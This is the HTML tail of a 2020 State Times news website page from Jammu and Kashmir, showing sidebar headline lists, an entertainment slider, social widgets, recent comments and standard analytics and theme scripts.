			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/hc-quashes-psa-against-five-stone-pelters-in-kashmir/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="HC quashes PSA against five stone pelters in Kashmir" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/hc-quashes-psa-against-five-stone-pelters-in-kashmir/">HC quashes PSA against five stone pelters in Kashmir</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T00:55:39+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/snowfall-likely-in-kashmir-on-new-year-day/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Snowfall likely in Kashmir on New Year day" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/snowfall-likely-in-kashmir-on-new-year-day/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Snowfall likely in Kashmir on New Year day" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/snowfall-likely-in-kashmir-on-new-year-day/">Snowfall likely in Kashmir on New Year day</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T00:55:36+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

									                                    </div>
</div><div class="tab-content"><a href="#" class="mom-tw-title">Cities n Towns</a>		<ul>
		
			<li><a href="http://news.statetimes.in/jkpsa-urges-lt-governor-to-settle-grievances-of-private-schools/">JKPSA urges Lt Governor to settle grievances of private schools</a></li>

			
			<li><a href="http://news.statetimes.in/army-launches-search-operation-in-nowshera/">Army launches search operation in Nowshera</a></li>

			
			<li><a href="http://news.statetimes.in/police-books-notorious-drug-peddler-under-pitndps-act/">Police books &#8216;notorious&#8217; drug peddler under “PITNDPS ACT”</a></li>

			
			<li><a href="http://news.statetimes.in/man-injured-in-cylinder-blast/">Man injured in cylinder blast</a></li>

			
			<li><a href="http://news.statetimes.in/civilian-injured-in-landmine-blast-in-poonch/">Civilian injured in landmine blast in Poonch</a></li>

			
			<li><a href="http://news.statetimes.in/rgmce-celebrates-new-year/">RGMCE celebrates New Year</a></li>

			
			<li><a href="http://news.statetimes.in/recent-job-advertisement-by-high-court-proof-of-bjps-back-stabbing-of-jammunities-manohar/">Recent job advertisement by high court proof of BJP&#8217;s back-stabbing of Jammunities: Manohar</a></li>

			
			<li><a href="http://news.statetimes.in/district-treasury-office-ramban-bids-farewell-to-dto/">District Treasury Office  Ramban bids farewell to DTO</a></li>

			
			<li><a href="http://news.statetimes.in/nhpc-salal-to-develop-sailanjan-village-of-reasi/">NHPC Salal to develop Sailanjan village of Reasi</a></li>

			
			<li><a href="http://news.statetimes.in/army-takes-initiative-to-empower-village-women-for-making-them-self-reliant/">Army takes initiative to empower village women for making them self-reliant</a></li>

			
			<li><a href="http://news.statetimes.in/17-bovines-rescued-smuggler-nabbed-2/">17 bovines rescued, smuggler nabbed</a></li>

			
			<li><a href="http://news.statetimes.in/ssp-reviews-security-of-railway-station-katra/">SSP reviews security of Railway Station Katra</a></li>

			
			<li><a href="http://news.statetimes.in/congress-insulting-dream-of-mahatma-gandhi-by-opposing-caa-priya/">Congress insulting dream of Mahatma Gandhi by opposing CAA: Priya</a></li>

			
			<li><a href="http://news.statetimes.in/mankotia-seeks-cancellation-of-job-offer-for-outsiders/">Mankotia seeks cancellation of job offer for outsiders</a></li>

			
			<li><a href="http://news.statetimes.in/congress-condemns-detention-of-party-leaders/">Congress condemns detention of party leaders</a></li>

			
			<li><a href="http://news.statetimes.in/national-model-academy-celebrates-annual-day-2/">National Model Academy celebrates Annual Day</a></li>

											</ul>
</div>                            </div>
                        </div> <!--main tabs-->

            </div><div class="widget momizat-posts_slider"><div class="widget-head"><h3 class="widget-title"><span>Entertainment n Lifestyle</span></h3></div>			<script>
			jQuery(document).ready(function ($) {
				jQuery('.mpsw-slider').flexslider({
					animation : 'slide',
					controlNav: false,
					smoothHeight: true,
					prevText: '',
					nextText: '',
					slideshow: 1,
					slideshowSpeed: 4000,
				});
			});
			</script>
			<div class="mom-posts-slide-widget type-">
                            <div class="mpsw-slider">
                              <ul class="slides">
											<li>
			<a href="https://news.statetimes.in/didnt-want-to-do-surface-level-scream-fest-with-ghost-stories-zoya-akhtar/"><img src="http://news.statetimes.in/wp-content/uploads/2019/12/Didnt-want-to-do-surface-level-scream-fest-with-Ghost-Stories-Zoya-Akhtar.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/12/Didnt-want-to-do-surface-level-scream-fest-with-Ghost-Stories-Zoya-Akhtar.jpg" alt="Didn't want to do surface-level scream fest with 'Ghost Stories': Zoya Akhtar" width="265" height="168">			  <p class="slide-caption">Didn&#8217;t want to do surface-level scream fest with &#8216;Ghost Stories&#8217;: Zoya Akhtar</p>
			  </a>
			</li>
																		<li>
			<a href="https://news.statetimes.in/take-pride-in-recognition-of-my-profession-bachchan-on-dadasaheb-phalke-award/"><img src="http://news.statetimes.in/wp-content/uploads/2019/12/Amitabh-1.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/12/Amitabh-1.jpg" alt="Take pride in recognition of my profession: Bachchan on Dadasaheb Phalke Award" width="265" height="168">			  <p class="slide-caption">Take pride in recognition of my profession: Bachchan on Dadasaheb Phalke Award</p>
			  </a>
			</li>
																		<li>
			<a href="https://news.statetimes.in/amitabh-bachchan-gets-dadasaheb-phalke-award/"><img src="http://news.statetimes.in/wp-content/uploads/2019/12/Amitabh.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/12/Amitabh.jpg" alt="Amitabh Bachchan gets Dadasaheb Phalke Award" width="265" height="168">			  <p class="slide-caption">Amitabh Bachchan gets Dadasaheb Phalke Award</p>
			  </a>
			</li>
																		<li>
			<a href="https://news.statetimes.in/hypertension-displays-winter-peak-dr-sushil/"><img src="http://news.statetimes.in/wp-content/uploads/2019/12/Hypertension-displays-a-winter-peak-Dr.-Sushil.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2019/12/Hypertension-displays-a-winter-peak-Dr.-Sushil.jpg" alt="Hypertension displays winter peak:  Dr Sushil" width="265" height="168">			  <p class="slide-caption">Hypertension displays winter peak:  Dr Sushil</p>
			  </a>
			</li>
																		<li>
			<a href="https://news.statetimes.in/opinions-justified-violence-is-no-solution-ajay-devgn-on-caa-protests/"><img src="http://news.statetimes.in/wp-content/uploads/2016/08/Shivaay-doesnt-have-religion-angle-Ajay-Devgn.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/08/Shivaay-doesnt-have-religion-angle-Ajay-Devgn.jpg" alt="Opinions justified, violence is no solution: Ajay Devgn on CAA protests" width="265" height="168">			  <p class="slide-caption">Opinions justified, violence is no solution: Ajay Devgn on CAA protests</p>
			  </a>
			</li>
															                              </ul>
                            </div>
                        </div>

</div>
           </div> <!--main sidebar-->
            <div class="clear"></div>                      </div> <!--main inner-->
            
      </div> <!--content boxed wrapper-->
                        <footer id="footer">
                <div class="inner">
	     			<div class="one_fourth">
		<div class="widget momizat-social_counter"><div class="widget-head"><h3 class="widget-title"><span>Socials Counter</span></h3></div>
                        <div class="mom-socials-counter">
                            <ul>
                                                                    <li class="msc-item msc-rss">
                                        <a href="http://news.statetimes.in/feed/"><div class="sc-head">
                                            <i class="fa-icon-rss"></i>
                                            <span>RSS</span>
                                        </div>
                                        </a>
                                        <div class="sc-count">
                                            <span>1000+</span>
                                            Subscribers                                        </div>
                                    </li>
                                
                                
                                                                <li class="msc-item msc-twitter">
                                    <a href="http://twitter.com/@state_times" target="_blank">
                                    <div class="sc-head">
                                        <i class="fa-icon-twitter"></i>
                                        <span>twitter</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>1510</span>
                                        followers                                    </div>
                                </li>
                                
                                                                <li class="msc-item msc-googlePlus">
                                    <a href=""  target="_blank">
                                        <div class="sc-head">
                                        <i class="fa-icon-google-plus"></i>
                                        <span>google+</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>0</span>
                                        followers                                    </div>
                                </li>
                                
                                
                                
                                
                                
                                
                                
				
                                                            </ul>
                        </div>
</div>			</div>
			<div class="one_fourth">
		<div class="widget momizat-facebook"><div class="widget-head"><h3 class="widget-title"><span>State Times on Facebook</span></h3></div>                <div class="mom_facebook_likebox" style="background:#fff;border:1px solid #e5e5e5;">
<iframe src="//www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/statetimes&amp;width=263&amp;height=290&amp;colorscheme=light&amp;show_faces=true&amp;show_border=false&amp;stream=false&amp;header=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:263px; height:290px;" allowTransparency="true"></iframe>

</div><!--like_box_footer-->

</div>			</div>
			<div class="one_fourth">
			        			</div>
			<div class="one_fourth last">
		<div class="widget momizat-recent_comments"><div class="widget-head"><h3 class="widget-title"><span>Recent Comments</span></h3></div>  <div class="mom-recent-comments">
                            <ul>
                                <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/#comment-26724" title="thietbicuuhoa.com on CISF seizes 5 gold bars at Hyderabad Airport"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/#comment-26724" title="thietbicuuhoa.com on CISF seizes 5 gold bars at Hyderabad Airport">thietbicuuhoa.com</a> <time>on 15 Dec </time><span class="rc-post">in: <a href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/">CISF seizes 5 gold bars at Hyderabad Airport</a></span></h4>
                                    <p>I have read so many articles or reviews on the topic of the blogger ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/cisf-seizes-5-gold-bars-at-hyderabad-airport/#comment-26724" title="thietbicuuhoa.com on CISF seizes 5 gold bars at Hyderabad Airport">Read more</a>
 -->                                    </div>
                                </li>
                                                          <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/#comment-24361" title="scr888 judi on Gold prices extend slide on lacklustre demand"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/#comment-24361" title="scr888 judi on Gold prices extend slide on lacklustre demand">scr888 judi</a> <time>on 02 Dec </time><span class="rc-post">in: <a href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/">Gold prices extend slide on lacklustre demand</a></span></h4>
                                    <p>With the desire comes having of invention. Even you feel hurt when he ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/gold-prices-extend-slide-on-lacklustre-demand/#comment-24361" title="scr888 judi on Gold prices extend slide on lacklustre demand">Read more</a>
 -->                                    </div>
                                </li>
                          
                            </ul>
        </div>
</div>			</div>
	    
        <div class="clear"></div>
                </div> <!--// footer inner-->
            </footer> <!--//footer-->
            <div class="copyrights-area">
                <div class="inner">
                    <p class="copyrights-text">© 2017 <a href="#">State Times Daily Newspaper</a></p>
                        <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>				                <div class="responsive-toggle">
                	<a class="desktop-version" href="?responsive=false">Desktop Version</a>
                	<a class="mobile-version" href="?responsive=true">Mobile Version</a>
                </div>
                                </div>
           </div>
            <div class="clear"></div>
        </div> <!--Boxed wrap-->
        <a href="#" class="scrollToTop button"><i class="enotype-icon-arrow-up"></i></a>	<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-16385353-2', 'auto');
  ga('require', 'displayfeatures');
  ga('require', 'linkid', 'linkid.js');
  ga('send', 'pageview');

</script>        <script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/comment-reply.min.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/news.statetimes.in\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/js/scripts.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/plugins.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var momAjaxL = {"url":"http:\/\/news.statetimes.in\/wp-admin\/admin-ajax.php","nonce":"3f46bc2cc7","success":"check your email to complete subscription","error":"Already subscribed","error2":"Email invalid","werror":"Enter a valid city name.","nomore":"No More Posts","homeUrl":"http:\/\/news.statetimes.in","viewAll":"View All","noResults":"Sorry, no posts matched your criteria","bodyad":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/main.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/jquery.nicescroll.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/wp-embed.min.js?x39047'></script>
<script async="async" type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/akismet/_inc/form.js?x39047'></script>
    </body>
</html>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

Page Caching using disk 

Served from: news.statetimes.in @ 2020-01-01 01:58:52 by W3 Total Cache
-->